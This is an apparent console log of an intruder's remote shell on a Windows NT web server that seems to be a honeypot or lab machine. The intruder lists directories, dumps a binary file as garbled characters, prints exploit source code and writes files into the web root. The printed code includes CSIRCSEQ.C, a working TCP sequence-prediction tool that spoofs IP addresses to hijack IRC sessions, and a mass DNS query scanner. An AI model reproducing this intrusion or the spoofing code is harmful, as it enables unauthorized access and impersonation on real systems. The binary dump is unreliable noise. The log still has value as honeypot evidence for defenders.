Microsoft(R) Windows NT(TM) (C) Copyright 1985-1996 Microsoft Corp. C:\Program Files\Common Files\system\msadc>cd .. cd .. C:\Program Files\Common Files\System> C:\Program Files\Common Files\System>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\Program Files\Common Files\System 12/07/00 03:23p . 12/07/00 03:23p .. 12/07/00 03:34p ado 02/04/01 07:04a msadc 12/07/00 03:34p ole db 11/11/97 12:50p 399,120 wab32.dll 6 File(s) 399,120 bytes 1,690,259,968 bytes free C:\Program Files\Common Files\System> C:\Program Files\Common Files\System>D: D: The system cannot find the drive specified. C:\Program Files\Common Files\System> C:\Program Files\Common Files\System>cd .. cd .. C:\Program Files\Common Files> C:\Program Files\Common Files>cd .. cd .. C:\Program Files> C:\Program Files>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\Program Files 12/21/00 08:59p . 12/21/00 08:59p .. 12/07/00 03:11p Common Files 12/21/00 08:59p D4 12/07/00 03:23p ICW-Internet Connection Wizard 12/07/00 03:37p Microsoft FrontPage 12/07/00 03:34p Mts 12/07/00 03:23p Outlook Express 11/26/00 06:42p Plus! 12/16/00 06:54p Syslogd 11/26/00 06:56p Windows NT 11 File(s) 0 bytes 1,690,259,968 bytes free C:\Program Files> C:\Program Files>cd Outlook Express cd Outlook Express C:\Program Files\Outlook Express> C:\Program Files\Outlook Express>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\Program Files\Outlook Express 12/07/00 03:23p . 12/07/00 03:23p .. 11/11/97 10:25a 36,176 msimn.exe 10/30/97 10:19p 14,182 msimn.txt 11/11/97 10:25a 97,424 msimnimp.dll 11/11/97 12:50p 1,689,872 msimnui.dll 11/11/97 10:25a 26,144 wab.exe 11/11/97 10:25a 12,464 wabfind.dll 11/11/97 10:25a 106,752 wabimp.dll 11/11/97 10:25a 40,224 wabmig.exe 11/11/97 10:25a 48,624 _isetup.exe 11 File(s) 2,071,862 bytes 1,690,259,968 bytes free C:\Program Files\Outlook Express> C:\Program Files\Outlook Express>cd ../../ cd ../../ C:\Program Files> C:\Program Files>cd .. cd .. C:\> C:\>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 02/04/01 07:07a 5,327 har.txt 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 02/04/01 06:49a 69 README.NOW.Hax0r 12/21/00 08:59p TEMP 02/04/01 07:14a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 15 File(s) 78,648,918 bytes 1,690,259,968 bytes free C:\> C:\>type yay.txt type yay.txt C:\> C:\>mkdir test mkdir test C:\> C:\>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 02/04/01 07:07a 5,327 har.txt 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 02/04/01 06:49a 69 README.NOW.Hax0r 12/21/00 08:59p TEMP 02/04/01 07:22a test 02/04/01 07:14a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 16 File(s) 78,648,918 bytes 1,690,259,968 bytes free C:\> C:\>type har.txt type har.txt MSCF,I`D*h $$hive$$.tmp~`CKt5ٳx?/)6c C6hu9- PCv pu o#܅YE\"90r_~ jZFm 7>NCT㞅w,f|Yb|8[eg=a,rjcgzἋZfq{c8oMj#Ɇ\;\{'\"I,'#z|8fcv}ׄ[ZVAɖKo/Wmgg/6xCy#%k<[!N_~ڇL:AqWC^::RWRO-oxFkrx>35+q,cz[imaS-_l+?=@r8=e_;v6k*/~e)i=  g <վpH-1mg$=IZ&Ƃ=ۣ(evpq"v8? 2z>b ikjP< >'4xUe{JJ*ʫ*K*ʽe*oOieUEwG~Y&tr -Y'VNyT/T< #[YCy4D> Rp3}MS8(Q"HCH<ֆa^2yjea'>E Gc.7 k"Qޟ3W[rE7.Uh H?el˷o$e"z)v vt>.GO&9^2URb[`B&Ok$\^1ԫZm7E$ >VmVh/`k<2ܻ gQ|8\5^Cgia\ 퀅AR\ ރ^ϩ6Hq}tt{Ljb T^w] gq>.>)Qb";`z3'LZ(󼞆aS-?bqP\|%o-Fx{>.xusSU-M _|2z0\v29﹜_v_F?Y2OjZ ]vv)g8\f81a/%ۭ3_ 뼵 ՘.733\fY~*duZװӻ(#Ē|D˴>mYf+bW >MaogupM7\X:o8ܙ5z9R%e|Be_Fm1ojz]ٚPVת0Z`rY6ȲW^Q|^yf K+2DP(gP8zmMk|nzZ1;^ZGԁt lH)o脯o`=݂)J'a˾6rm/ ;F؃/%ɉ}3*_Ц}[-MΟL;V;kPqf(S<(Q?)^ZhSo:7[G<ϲm2$MlA[/=/_o}W*.\n%'ȟ^ȭ7o+1-Q9-~D8˭ߥmGI9NՊS>5(^.u|o >?KG-40qr}ܿ%.y߭p {.!ņQG;sŀOg\JWZ_M4i!'} 暨A1R~5*{m ^[_kqSϫO}\֙ܥЙc=D殛oƭk)ZUGޏnlh~_p^^ ߾;U?^|{ķg':(ᯇ+t,_LŶo1_H/"&KWMfO#'f)Y)ֱkvodׁM:YbpZgp T6J;'-~F 'RGb0&"xﺤ_1#<8NPpK';~ιuOb{z"Nh\Β)\`kM= ? LmVK}1+[UC ѓ7 =e_:5vc;ㅱkv0`s)5ѳu)cءc|MDLq%q5Tk[Ͳ81^uãuݰְ%n1=nQj+hC]<0ckG4Ohc3d*]Nr~glq ^e1d(vbrM\jw7;6~u:ZYf?ӸkG mPKz栃=S?`=o8֥l_A":M;N[Jy[& _T|I$OLcE,XUyp0os64~2v`vWgy}AW]#]*:wv>D,ĹrF=^>ߔQ+~"My>YUuZ~RkK_w+!ͺq!|Bmur~Mh1s~KN=f-/i7]\VƻAq̤4gYUnQ𫋯qoڡ?řT*q"a">.sa9~ )ct~5'k^%N&|귷ΧFɏz/9 ߍhen?8DtLjb%~A\FC|?V`P&]\cpO|XNm < r 4% V22鯱!>*9zީ8L3<y}Ӎ,/4pp@'7I'3_%ȉ?lVԩF[[F{z9!%L$60ZT!k0a6Fh>OhvaIəCr\U kյ4`&癄mbeEW:3hmrd>njW)xuƎƲ1ώP(+ñ`Oc>2q CJkϣmK;B푮]0Cn2XoѓTulQ|jee:]; rYAp=vuE.2)XHizMSIN;{.zz9zzR Ovօ [ͥ`4蕀3[H)''L0xyzMr >P F=탩>KzH'oz}T=>N{WAMG퐩Qye_u£>G;o*`7_: ǂ`lވ@CNB&߆gqS #~#!}GZ!@\$9yrMLϐ㐓 ~e!A&? ' Ayֹ B : 9^8df_ ٟyBdñ{9dTũY崾1"76kKePMxo8_2 C:\> C:\>dir dir The name specified is not recognized as an internal or external command, operable program or batch file. C:\> C:\>cd exploits cd exploits C:\exploits> C:\exploits>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\exploits 12/26/00 07:36p . 12/26/00 07:36p .. 12/26/00 07:36p microsoft 12/26/00 07:35p newfiles 12/26/00 07:24p unix 5 File(s) 0 bytes 1,690,259,968 bytes free C:\exploits> C:\exploits>cd unix cd unix C:\exploits\unix> C:\exploits\unix>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\exploits\unix 12/26/00 07:24p . 12/26/00 07:24p .. 12/26/00 07:25p sunos-exploits 12/26/00 07:24p tcp-exploits 12/26/00 07:24p trojans 12/26/00 07:16p udp-exploits 12/26/00 07:15p ultrix-exploits 12/26/00 07:15p xwin-exploits 8 File(s) 0 bytes 1,690,259,968 bytes free C:\exploits\unix> C:\exploits\unix>cd sunos-exploits cd sunos-exploits C:\exploits\unix\sunos-exploits> C:\exploits\unix\sunos-exploits>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\exploits\unix\sunos-exploits 12/26/00 07:25p . 12/26/00 07:25p .. 03/23/98 10:25a 3,209 binmail.sh 03/23/98 10:25a 4,343 chup.c 03/23/98 10:25a 964 kcms.sh 03/23/98 10:25a 1,522 lastlog.c 03/23/98 10:25a 4,988 nittie.c 03/23/98 10:25a 4,622 passwdscript.sh 8 File(s) 19,648 bytes 1,690,259,968 bytes free C:\exploits\unix\sunos-exploits> C:\exploits\unix\sunos-exploits>cd .. cd .. C:\exploits\unix> C:\exploits\unix>cd .. cd .. C:\exploits> C:\exploits>cd .. cd .. C:\> C:\>echo best honeypot i've seen till now :) > rfp.txt echo best honeypot i've seen till now :) > rfp.txt C:\> C:\>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 02/04/01 07:07a 5,327 har.txt 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 02/04/01 06:49a 69 README.NOW.Hax0r 02/04/01 07:23a 38 rfp.txt 12/21/00 08:59p TEMP 02/04/01 07:22a test 02/04/01 07:15a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 17 File(s) 78,648,956 bytes 1,690,259,968 bytes free C:\> C:\>cd exploits cd exploits C:\exploits> C:\exploits>cd .. cd .. C:\> C:\>cd wiretrip cd wiretrip C:\wiretrip> C:\wiretrip>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\wiretrip 12/26/00 07:09p . 12/26/00 07:09p .. 12/26/00 07:04p 15,501 msadc1.pl 12/26/00 07:04p 17,865 msadc2.pl 12/26/00 07:04p 4,425 RFParalyze.c 12/26/00 07:04p 2,269 RFPickaxe.pl 12/26/00 07:05p 7,393 RFPoison.c 12/26/00 07:04p 12,450 RFPoison.zip 12/26/00 07:04p 1,792 RFProwl.c 12/26/00 07:06p 170,372 whisker.tar.gz 12/26/00 07:06p 173,427 whisker.zip 12/26/00 07:05p 25,229 whiskerids.html 12 File(s) 430,723 bytes 1,690,259,968 bytes free C:\wiretrip> C:\wiretrip>cd .. cd .. C:\> C:\>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 02/04/01 07:07a 5,327 har.txt 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 02/04/01 06:49a 69 README.NOW.Hax0r 02/04/01 07:23a 38 rfp.txt 12/21/00 08:59p TEMP 02/04/01 07:22a test 02/04/01 07:15a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 17 File(s) 78,648,956 bytes 1,690,259,968 bytes free C:\> C:\>cd exploits cd exploits C:\exploits> C:\exploits>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\exploits 12/26/00 07:36p . 12/26/00 07:36p .. 12/26/00 07:36p microsoft 12/26/00 07:35p newfiles 12/26/00 07:24p unix 5 File(s) 0 bytes 1,690,259,968 bytes free C:\exploits> C:\exploits>cd newfiles cd newfiles C:\exploits\newfiles> C:\exploits\newfiles>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\exploits\newfiles 12/26/00 07:35p . 12/26/00 07:35p .. 2 File(s) 0 bytes 1,690,259,968 bytes free C:\exploits\newfiles> C:\exploits\newfiles>cd ../unix cd ../unix C:\exploits> C:\exploits>cd unix cd unix C:\exploits\unix> C:\exploits\unix>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\exploits\unix 12/26/00 07:24p . 12/26/00 07:24p .. 12/26/00 07:25p sunos-exploits 12/26/00 07:24p tcp-exploits 12/26/00 07:24p trojans 12/26/00 07:16p udp-exploits 12/26/00 07:15p ultrix-exploits 12/26/00 07:15p xwin-exploits 8 File(s) 0 bytes 1,690,259,968 bytes free C:\exploits\unix> C:\exploits\unix>cd tcp-exploits cd tcp-exploits C:\exploits\unix\tcp-exploits> C:\exploits\unix\tcp-exploits>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\exploits\unix\tcp-exploits 12/26/00 07:24p . 12/26/00 07:24p .. 03/23/98 10:26a 1,330 ALLHOSTS.C 03/23/98 10:26a 7,436 bounce.c 03/23/98 10:26a 4,841 CSIRCSEQ.C 03/23/98 10:26a 4,465 datapipe.c 03/23/98 10:26a 3,782 KILL-ME.C 03/23/98 10:26a 8,548 NNTPFORG.C 03/23/98 10:26a 9,372 SZ-SEQ.C 03/23/98 10:26a 5,924 TSPOOF.C 10 File(s) 45,698 bytes 1,690,259,968 bytes free C:\exploits\unix\tcp-exploits> C:\exploits\unix\tcp-exploits>type ALLHOSTS.C type ALLHOSTS.C ..:-={{Collaborative Security Information Center}}=-:.. X-TREME & TECHNOTRONIC Security Collaboration Project http://www.technotronic.com -=(c)=- http://www.x-treme.abyss.com /* Mass DNS Query program for vicy, by crisk. */ #include #include #include #include #include #include void main(int argc, char *argv[]) { unsigned long current; struct hostent *host; char *curname; char thename[70]; int i,j,num; struct in_addr addr; if (argc<3) { printf("Not enough args\n"); return; } num = atoi(argv[2]); host = gethostbyname(argv[1]); if (!host) { printf("Cannot resolve starting point. Aborting.\n"); return; } current = *((unsigned long *)host->h_addr); printf("Beginning DNS lookups\n"); for (i=0;ih_name : curname); j = 0; if (host) while (host->h_aliases[j] != NULL) printf("\r%s",host->h_aliases[j++]); current += 0x01000000; printf("\n"); } printf("Ending DNS lookups.\n"); } C:\exploits\unix\tcp-exploits> C:\exploits\unix\tcp-exploits>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\exploits\unix\tcp-exploits 12/26/00 07:24p . 12/26/00 07:24p .. 03/23/98 10:26a 1,330 ALLHOSTS.C 03/23/98 10:26a 7,436 bounce.c 03/23/98 10:26a 4,841 CSIRCSEQ.C 03/23/98 10:26a 4,465 datapipe.c 03/23/98 10:26a 3,782 KILL-ME.C 03/23/98 10:26a 8,548 NNTPFORG.C 03/23/98 10:26a 9,372 SZ-SEQ.C 03/23/98 10:26a 5,924 TSPOOF.C 10 File(s) 45,698 bytes 1,690,259,968 bytes free C:\exploits\unix\tcp-exploits> C:\exploits\unix\tcp-exploits>type CSIRCSEQ.C type CSIRCSEQ.C ..:-={{Collaborative Security Information Center}}=-:.. X-TREME & TECHNOTRONIC Security Collaboration Project http://www.technotronic.com -=(c)=- http://www.x-treme.abyss.com /* */ /* iRC SEQUENCER v0.0001 = MUTUALLY DEVELOPED BY Z AND VECT0R-X */ /* Under Solaris try: */ /* gcc x.c -lsocket -lnsl -L/usr/ucblib -lucb */ #include "tcpip.c" unsigned long sourceport = 23; unsigned long dest, spoofed, src, nseq, tarport, temp; char *nickn, *userid, *channel, *ircname, *current; char str[255], *string; char buf[4096]; int len, rec, sen, i=1, adder=128000, stringlen=0; struct sockaddr_in addr, spoofedaddr; struct hostent *host; void main(int argc, char *argv[]) { unsigned long fakesequence = 408618+getpid(); system("clear"); printf("iRC SEQUENCE - Writtin by z and vect0rx.\n\n"); if (argc != 9) { fprintf(stderr,"Usage: %s {1|2}\n\n",argv[0]); fprintf(stderr," - Site spoof is attempted on.\n"); fprintf(stderr," - Port to access on .\n"); fprintf(stderr," - Nickname for spoof to user.\n"); fprintf(stderr," - Account name of spoof.\n"); fprintf(stderr," - Host to appear from.\n"); fprintf(stderr," - Default is (*Unknown*).\n"); fprintf(stderr," (w/o #) - Initial channel (0 for none).\n"); fprintf(stderr," 1 - Offset of 128000 (common).\n"); fprintf(stderr," 2 - Offset of 64000 (not likely).\n\n"); exit(1); } tarport = atoi(argv[2]); nickn = argv[3]; userid = argv[4]; ircname = argv[6]; channel = argv[7]; if (argv[8][0] == '2') adder=64000; memset(&spoofedaddr,0,sizeof(spoofedaddr)); spoofedaddr.sin_family = AF_INET; if ((spoofedaddr.sin_addr.s_addr = inet_addr(argv[5])) == -1) { if ((host = gethostbyname(argv[5])) == NULL) { printf("Unknown host %s.\n",argv[5]); exit(1); } spoofedaddr.sin_family = host->h_addrtype; memcpy((caddr_t) &spoofedaddr.sin_addr,host->h_addr,host->h_length); } memcpy(&spoofed,(char *)&spoofedaddr.sin_addr.s_addr,4); memset(&addr,0,sizeof(addr)); addr.sin_family = AF_INET; if ((addr.sin_addr.s_addr = inet_addr(argv[1])) == -1) { if ((host = gethostbyname(argv[1])) == NULL) { printf("Unknown host %s.\n",argv[1]); exit(1); } addr.sin_family = host->h_addrtype; memcpy((caddr_t) &addr.sin_addr,host->h_addr,host->h_length); } memcpy(&dest,(char *)&addr.sin_addr.s_addr,4); if ((rec = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) < 0) { perror("error: recv socket"); exit(1); } if ((sen = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("error: send socket"); exit(1); } /* sen = openintf("ppp0"); */ gethostname(buf, 128); if ((host=gethostbyname(buf))==NULL) { fprintf(stderr, "Can't get my hostname!?\n"); exit(1); } memcpy(&src,host->h_addr,4); sendtcppacket(sen, src, dest, &addr, TH_SYN, sourceport, tarport, fakesequence, 0, NULL, 0); for (;;) { gettcppacket(rec,buf,sizeof(buf)); ip = (struct iphdr *) buf; if (ip->saddr != dest) continue; len = ip->ihl << 2; tcp = (struct tcphdr *) (buf+len); if (ntohs(tcp->th_dport)==sourceport && ntohs(tcp->th_sport)==tarport) { temp=htonl(tcp->th_seq); nseq=temp; nseq+=adder; printf("Sequence returned is %lu, Offset is %lu\n", nseq, adder); sendtcppacket(sen, src, dest, &addr, TH_RST, sourceport, tarport, fakesequence, 0, NULL, 0); break; /* out of for loop */ } } printf("%s!%s@%s on server %s:%d on channel %s\n", nickn, userid, argv[5], argv[1], tarport, channel); sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_SYN,sourceport, tarport,fakesequence,0,NULL,0); printf("SYN Devilered, Waiting on SYN/ACK reply.\n"); fflush(stdout); usleep(10000); sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_ACK,sourceport, tarport,++fakesequence,++nseq,NULL,0); printf("ACK Devilered, Assuming safe to send data.\n"); fflush(stdout); usleep(5000); printf("Sending irc client handshake for %s.\n", nickn); fflush(stdout); sprintf(str,"USER %s # # :%s\r\nNICK %s\r\nJOIN #%s\r\n", userid, ircname, nickn, channel); stringlen = strlen(str); sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_ACK|TH_PUSH,sourceport, tarport,fakesequence,nseq,str,stringlen); fakesequence+=stringlen; current = channel; for(;;) { printf("vczseq:#%s> ", current); fflush(stdout); string = fgets(str, 255, stdin); stringlen = strlen(string); sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_ACK|TH_PUSH,sourceport, tarport,fakesequence,nseq,string,stringlen); fakesequence+=stringlen; } } /* */ C:\exploits\unix\tcp-exploits> C:\exploits\unix\tcp-exploits>C: C: C:\exploits\unix\tcp-exploits> C:\exploits\unix\tcp-exploits>cd .. cd .. C:\exploits\unix> C:\exploits\unix>cd .. cd .. C:\exploits> C:\exploits>cd .. cd .. C:\> C:\>cd .. cd .. C:\> C:\>D: D: The system cannot find the drive specified. C:\> C:\>A: A: The system cannot find the drive specified. C:\> C:\>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 02/04/01 07:07a 5,327 har.txt 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 02/04/01 06:49a 69 README.NOW.Hax0r 02/04/01 07:23a 38 rfp.txt 12/21/00 08:59p TEMP 02/04/01 07:22a test 02/04/01 07:15a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 17 File(s) 78,648,956 bytes 1,690,259,968 bytes free C:\> C:\>type README.NOW.Hax0r type README.NOW.Hax0r Hi, i know that this a is a lab server, but patch the holes! :-) C:\> C:\>cd Program Files cd Program Files C:\Program Files> C:\Program Files>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\Program Files 12/21/00 08:59p . 12/21/00 08:59p .. 12/07/00 03:11p Common Files 12/21/00 08:59p D4 12/07/00 03:23p ICW-Internet Connection Wizard 12/07/00 03:37p Microsoft FrontPage 12/07/00 03:34p Mts 12/07/00 03:23p Outlook Express 11/26/00 06:42p Plus! 12/16/00 06:54p Syslogd 11/26/00 06:56p Windows NT 11 File(s) 0 bytes 1,690,259,968 bytes free C:\Program Files> C:\Program Files>cd .. cd .. C:\> C:\>cd Inetpub cd Inetpub C:\InetPub> C:\InetPub>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\InetPub 12/07/00 03:30p . 12/07/00 03:30p .. 11/26/00 12:40p ftproot 11/26/00 12:40p gophroot 12/07/00 03:31p iissamples 11/26/00 12:40p scripts 02/04/01 07:15a wwwroot 7 File(s) 0 bytes 1,690,259,968 bytes free C:\InetPub> C:\InetPub>cd wwwroot cd wwwroot C:\InetPub\wwwroot> C:\InetPub\wwwroot>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\InetPub\wwwroot 02/04/01 07:15a . 02/04/01 07:15a .. 12/07/00 03:37p cgi-bin 12/07/00 03:37p 4,663 default.asp 12/15/00 10:26p 1,233 default.htm 12/07/00 03:37p 4,325 default.htm.org 12/15/00 09:15p guest 12/07/00 03:37p images 12/15/00 06:36p 709 lrfpbot.gif 12/15/00 07:05p 673 lrfptop.gif 12/15/00 06:36p 1,422 nmrc.gif 12/07/00 03:37p 2,504 postinfo.html 12/15/00 06:36p 968 rfp.gif 12/15/00 06:36p 8,606 rfpback.gif 12/15/00 06:36p 8,606 rfpback1.gif 11/26/00 12:40p samples 12/15/00 06:36p 1,624 sf.gif 12/15/00 06:36p 756 technotronic.gif 12/15/00 06:36p 2,526 void.gif 12/15/00 06:36p 1,213 whisker.gif 12/15/00 06:36p 1,161 win2k.gif 12/07/00 03:37p _private 12/07/00 03:37p 1,759 _vti_inf.html 23 File(s) 42,748 bytes 1,690,259,968 bytes free C:\InetPub\wwwroot> C:\InetPub\wwwroot>echo test > test.txt echo test > test.txt C:\InetPub\wwwroot> C:\InetPub\wwwroot>echo this can't be true > test.txt echo this can't be true > test.txt C:\InetPub\wwwroot> C:\InetPub\wwwroot>type test.txt type test.txt this can't be true C:\InetPub\wwwroot> C:\InetPub\wwwroot>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\InetPub\wwwroot 02/04/01 07:33a . 02/04/01 07:33a .. 12/07/00 03:37p cgi-bin 12/07/00 03:37p 4,663 default.asp 12/15/00 10:26p 1,233 default.htm 12/07/00 03:37p 4,325 default.htm.org 12/15/00 09:15p guest 12/07/00 03:37p images 12/15/00 06:36p 709 lrfpbot.gif 12/15/00 07:05p 673 lrfptop.gif 12/15/00 06:36p 1,422 nmrc.gif 12/07/00 03:37p 2,504 postinfo.html 12/15/00 06:36p 968 rfp.gif 12/15/00 06:36p 8,606 rfpback.gif 12/15/00 06:36p 8,606 rfpback1.gif 11/26/00 12:40p samples 12/15/00 06:36p 1,624 sf.gif 12/15/00 06:36p 756 technotronic.gif 02/04/01 07:34a 21 test.txt 12/15/00 06:36p 2,526 void.gif 12/15/00 06:36p 1,213 whisker.gif 12/15/00 06:36p 1,161 win2k.gif 12/07/00 03:37p _private 12/07/00 03:37p 1,759 _vti_inf.html 24 File(s) 42,769 bytes 1,690,259,968 bytes free C:\InetPub\wwwroot> C:\InetPub\wwwroot>w w The name specified is not recognized as an internal or external command, operable program or batch file. C:\InetPub\wwwroot> C:\InetPub\wwwroot>cd .. cd .. C:\InetPub> C:\InetPub>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\InetPub 12/07/00 03:30p . 12/07/00 03:30p .. 11/26/00 12:40p ftproot 11/26/00 12:40p gophroot 12/07/00 03:31p iissamples 11/26/00 12:40p scripts 02/04/01 07:33a wwwroot 7 File(s) 0 bytes 1,690,259,968 bytes free C:\InetPub> C:\InetPub>cd .. cd .. C:\> C:\>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 02/04/01 07:07a 5,327 har.txt 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 02/04/01 06:49a 69 README.NOW.Hax0r 02/04/01 07:23a 38 rfp.txt 12/21/00 08:59p TEMP 02/04/01 07:22a test 02/04/01 07:34a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 17 File(s) 78,648,956 bytes 1,690,259,968 bytes free C:\> C:\>crmdir test crmdir test The name specified is not recognized as an internal or external command, operable program or batch file. C:\> C:\>rmdir test rmdir test C:\> C:\>cd inetpub/wwwroot cd inetpub/wwwroot C:\InetPub> C:\InetPub>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\InetPub 12/07/00 03:30p . 12/07/00 03:30p .. 11/26/00 12:40p ftproot 11/26/00 12:40p gophroot 12/07/00 03:31p iissamples 11/26/00 12:40p scripts 02/04/01 07:33a wwwroot 7 File(s) 0 bytes 1,690,259,968 bytes free C:\InetPub> C:\InetPub>cd wwwroot cd wwwroot C:\InetPub\wwwroot> C:\InetPub\wwwroot>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\InetPub\wwwroot 02/04/01 07:33a . 02/04/01 07:33a .. 12/07/00 03:37p cgi-bin 12/07/00 03:37p 4,663 default.asp 12/15/00 10:26p 1,233 default.htm 12/07/00 03:37p 4,325 default.htm.org 12/15/00 09:15p guest 12/07/00 03:37p images 12/15/00 06:36p 709 lrfpbot.gif 12/15/00 07:05p 673 lrfptop.gif 12/15/00 06:36p 1,422 nmrc.gif 12/07/00 03:37p 2,504 postinfo.html 12/15/00 06:36p 968 rfp.gif 12/15/00 06:36p 8,606 rfpback.gif 12/15/00 06:36p 8,606 rfpback1.gif 11/26/00 12:40p samples 12/15/00 06:36p 1,624 sf.gif 12/15/00 06:36p 756 technotronic.gif 02/04/01 07:34a 21 test.txt 12/15/00 06:36p 2,526 void.gif 12/15/00 06:36p 1,213 whisker.gif 12/15/00 06:36p 1,161 win2k.gif 12/07/00 03:37p _private 12/07/00 03:37p 1,759 _vti_inf.html 24 File(s) 42,769 bytes 1,690,259,968 bytes free C:\InetPub\wwwroot> C:\InetPub\wwwroot>copy default.htm default.html copy default.htm default.html 1 file(s) copied. C:\InetPub\wwwroot> C:\InetPub\wwwroot>echo . >>default.htm echo . >>default.htm C:\InetPub\wwwroot> C:\InetPub\wwwroot>cd .. cd .. C:\InetPub> C:\InetPub>cd .. cd .. C:\> C:\>dir dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 02/04/01 07:07a 5,327 har.txt 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 02/04/01 06:49a 69 README.NOW.Hax0r 02/04/01 07:23a 38 rfp.txt 12/21/00 08:59p TEMP 02/04/01 07:34a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 16 File(s) 78,648,956 bytes 1,690,258,432 bytes free C:\> C:\>exit